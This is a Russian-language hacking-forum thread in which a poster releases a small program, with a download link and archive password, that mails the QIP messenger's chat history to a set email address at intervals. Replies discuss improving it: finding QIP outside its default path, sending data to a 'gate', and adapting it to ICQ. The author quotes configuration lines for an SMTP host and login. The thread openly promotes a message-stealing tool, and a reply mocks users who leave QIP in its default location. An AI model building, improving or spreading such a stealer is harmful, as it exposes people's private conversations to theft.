Предоставляю свой маленький релиз ! Значит сразу к делу : - программа отсылает историю сообщений на указаний мейл через определенный интервал времени . Работает только с QIP но переделать под ICQ или другой клиент я думаю не составит труда . пользуйтесь Link : http://x-sec.info/qip_send.rar Pass : n0153r
PrF:='C:\Program Files'; ну допустим у меня квип не там.. и унистал в реестре почищен.. чтож ты не продумал нормальный поиск местоположения квипа? =\ незочед =\
В этом вся и проблема, 4то квипа может быть установлен не по дефолту... Но, все лоси обы4но так и оставляют =) +1 за старания.
Просто программу делал за 2 часа. Всего не учел Постараюсь в следующих версиях исправить. Что не ясно ? Там 150 строк кода Кидаешь в настройках свой мейл и пас и компилиш ... SM.Host:='smtp.mail.ru'; //smtp SM.UserId:='-> LOGIN <-'; //Логин к почте SM.Password:='-> PASSWORD <-'; //Пароль к почте Если что не ясно напиши мне на мейл.
дорабатывай авто поиск квипа -- можешь еще не только на мыло а и на гейт типо сделать отсылку. и доку норм с оскрином а идея хорошая -- пригодится такая прога
ссылка в первом посту умерла (как и почти все файлы лежащие на том сайте куда ведёт линк). Огромная просьба и к автору, и к тем, у кого остались сорцы, перезалейте куда нибудь. Автора долго ждать чтоб он сделал сканер, и мне хочется самому добавить поиск (сканер) qip'а